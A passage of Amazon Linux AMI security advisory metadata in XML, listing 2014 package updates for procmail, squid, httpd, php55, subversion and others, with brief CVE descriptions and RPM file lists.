arch="i686"><filename>Packages/libcurl-7.38.0-1.46.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.38.0" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.38.0-1.46.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.38.0" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.38.0-1.46.amzn1.i686.rpm</filename></package><package name="curl" version="7.38.0" release="1.46.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.38.0-1.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-408</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-408: important priority package update for procmail</title><issued date="2014-09-17 21:46:00" /><updated date="2014-09-19 12:08:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3618:
A heap-based buffer overflow flaw was found in procmail's formail utility. A remote attacker could send an email with specially crafted headers that, when processed by formail, could cause procmail to crash or, possibly, execute arbitrary code as the user running formail.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3618" title="" id="CVE-2014-3618" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1172.html" title="" id="RHSA-2014:1172" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="procmail-debuginfo" version="3.22" release="25.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-debuginfo-3.22-25.1.6.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-3.22-25.1.6.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-3.22-25.1.6.amzn1.i686.rpm</filename></package><package name="procmail-debuginfo" version="3.22" release="25.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-debuginfo-3.22-25.1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-409</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-409: medium priority package update for fwsnort</title><issued date="2014-09-17 21:46:00" /><updated date="2014-09-19 12:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0039:
Untrusted search path vulnerability in fwsnort before 1.6.4, when not running as root, allows local users to execute arbitrary code via a Trojan horse fwsnort.conf in the current working directory.
1060602:
CVE-2014-0039 fwsnort: configuration file can be loaded from cwd when run as a non-root user
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0039" title="" id="CVE-2014-0039" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="fwsnort" version="1.6.4" release="1.5.amzn1" epoch="0" arch="noarch"><filename>Packages/fwsnort-1.6.4-1.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-410</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-410: important priority package update for jakarta-commons-httpclient</title><issued date="2014-09-17 21:47:00" /><updated date="2014-09-19 12:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3577:
It was found that the fix for CVE-2012-6153 was incomplete: the code added to check that the server hostname matches the domain name in a subject's Common Name (CN) field in X.509 certificates was flawed. A man-in-the-middle attacker could use this flaw to spoof an SSL server using a specially crafted X.509 certificate.
1129074:
CVE-2014-3577 Apache HttpComponents client: SSL hostname verification bypass, incomplete CVE-2012-6153 fix
CVE-2012-6153:
It was found that the fix for CVE-2012-5783 was incomplete: the code added to check that the server host name matches the domain name in a subject's Common Name (CN) field in X.509 certificates was flawed. A man-in-the-middle attacker could use this flaw to spoof an SSL server using a specially crafted X.509 certificate.
1129916:
CVE-2012-6153 Apache HttpComponents client: SSL hostname verification bypass, incomplete CVE-2012-5783 fix
CVE-2012-5783:
The Jakarta Commons HttpClient component did not verify that the server hostname matched the domain name in the subject's Common Name (CN) or subjectAltName field in X.509 certificates. This could allow a man-in-the-middle attacker to spoof an SSL server if they had a certificate that was valid for any domain name.
Apache Commons HttpClient 3.x, as used in Amazon Flexible Payments Service (FPS) merchant Java SDK and other products, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.
873317:
CVE-2012-5783 jakarta-commons-httpclient: missing connection hostname check against X.509 certificate name
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5783" title="" id="CVE-2012-5783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6153" title="" id="CVE-2012-6153" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3577" title="" id="CVE-2014-3577" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jakarta-commons-httpclient-manual" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-manual-3.1-15.8.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-demo" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-demo-3.1-15.8.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient-javadoc" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-javadoc-3.1-15.8.amzn1.noarch.rpm</filename></package><package name="jakarta-commons-httpclient" version="3.1" release="15.8.amzn1" epoch="1" arch="noarch"><filename>Packages/jakarta-commons-httpclient-3.1-15.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-411</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-411: important priority package update for squid</title><issued date="2014-09-17 21:47:00" /><updated date="2014-09-19 12:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3609:
A flaw was found in the way Squid handled malformed HTTP Range headers. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
CVE-2013-4115:
A buffer overflow flaw was found in Squid's DNS lookup module. A remote attacker able to send HTTP requests to the Squid proxy could use this flaw to crash Squid.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4115" title="" id="CVE-2013-4115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3609" title="" id="CVE-2014-3609" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1148.html" title="" id="RHSA-2014:1148" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.1.10" release="22.16.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.10-22.16.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="22.16.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.10-22.16.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.1.10" release="22.16.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.10-22.16.amzn1.i686.rpm</filename></package><package name="squid" version="3.1.10" release="22.16.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.10-22.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-412</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-412: important priority package update for axis</title><issued date="2014-09-17 21:47:00" /><updated date="2014-09-19 12:09:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3596:
It was discovered that Axis incorrectly extracted the host name from an X.509 certificate subject's Common Name (CN) field. A man-in-the-middle attacker could use this flaw to spoof an SSL server using a specially crafted X.509 certificate.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3596" title="" id="CVE-2014-3596" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1193.html" title="" id="RHSA-2014:1193" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="axis" version="1.2.1" release="7.5.14.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-1.2.1-7.5.14.amzn1.noarch.rpm</filename></package><package name="axis-javadoc" version="1.2.1" release="7.5.14.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-javadoc-1.2.1-7.5.14.amzn1.noarch.rpm</filename></package><package name="axis-manual" version="1.2.1" release="7.5.14.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-manual-1.2.1-7.5.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-413</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-413: medium priority package update for subversion</title><issued date="2014-09-17 21:48:00" /><updated date="2014-09-19 12:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3522:
The Serf RA layer in Apache Subversion 1.4.0 through 1.7.x before 1.7.18 and 1.8.x before 1.8.10 does not properly handle wildcards in the Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof servers via a crafted certificate.
1127063:
CVE-2014-3522 subversion: incorrect SSL certificate validation in Serf RA (repository access) layer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3522" title="" id="CVE-2014-3522" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-javahl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-ruby" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.10" release="1.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.10-1.44.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.10-1.44.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.10" release="1.44.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.10-1.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-414</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-414: low priority package update for httpd</title><issued date="2014-09-17 21:48:00" /><updated date="2014-09-19 12:10:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5704:
The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass "RequestHeader unset" directives by placing a header in the trailer portion of data sent with chunked transfer coding. NOTE: the vendor states "this is not a security issue in httpd as such."
1082903:
CVE-2013-5704 httpd: bypass of mod_headers rules via chunked requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5704" title="" id="CVE-2013-5704" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-debuginfo" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.29" release="1.4.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.29-1.4.amzn1.noarch.rpm</filename></package><package name="httpd" version="2.2.29" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.29" release="1.4.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.29-1.4.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.29" release="1.4.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.29" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.29" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.29" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.29-1.4.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.29" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.29-1.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-415</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-415: medium priority package update for php55</title><issued date="2014-09-18 21:03:00" /><updated date="2014-09-19 12:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5120:
gd_ctx.c in the GD component in PHP 5.4.x before 5.4.32 and 5.5.x before 5.5.16 does not ensure that pathnames lack %00 sequences, which might allow remote attackers to overwrite arbitrary files via crafted input to an application that calls the (1) imagegd, (2) imagegd2, (3) imagegif, (4) imagejpeg, (5) imagepng, (6) imagewbmp, or (7) imagewebp function.
1132793:
CVE-2014-5120 php: gd extension NUL byte injection in file names
CVE-2014-3587:
Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in the Fileinfo component in PHP before 5.4.32 and 5.5.x before 5.5.16, allows remote attackers to cause a denial of service (application crash) via a crafted CDF file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1571.
1128587:
CVE-2014-3587 file: incomplete fix for CVE-2012-1571 in cdf_read_property_info
CVE-2014-2497:
The gdImageCreateFromXpm function in gdxpm.c in libgd, as used in PHP 5.4.26 and earlier, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted color table in an XPM file.
1076676:
CVE-2014-2497 gd: NULL pointer dereference in gdImageCreateFromXpm()
CVE-2012-1571:
A denial of service flaw was found in the way the File Information (fileinfo) extension parsed certain Composite Document Format (CDF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted CDF file.
805197:
CVE-2012-1571 file: out of bounds read in CDF parser
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1571" title="" id="CVE-2012-1571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2497" title="" id="CVE-2014-2497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587" title="" id="CVE-2014-3587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5120" title="" id="CVE-2014-5120" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-fpm" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.17" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.17-1.90.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.17-1.90.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.17" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.17-1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-416</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-416: medium priority package update for json-c</title><issued date="2014-09-18 21:04:00" /><updated date="2014-09-19 12:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6371:
The hash functionality in json-c before 0.12 allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted JSON data, involving collisions.
1032311:
CVE-2013-6371 json-c: hash collision DoS
CVE-2013-6370:
Buffer overflow in the printbuf APIs in json-c before 0.12 allows remote attackers to cause a denial of service via unspecified vectors.
1032322:
CVE-2013-6370 json-c: buffer overflow if size_t is larger than int
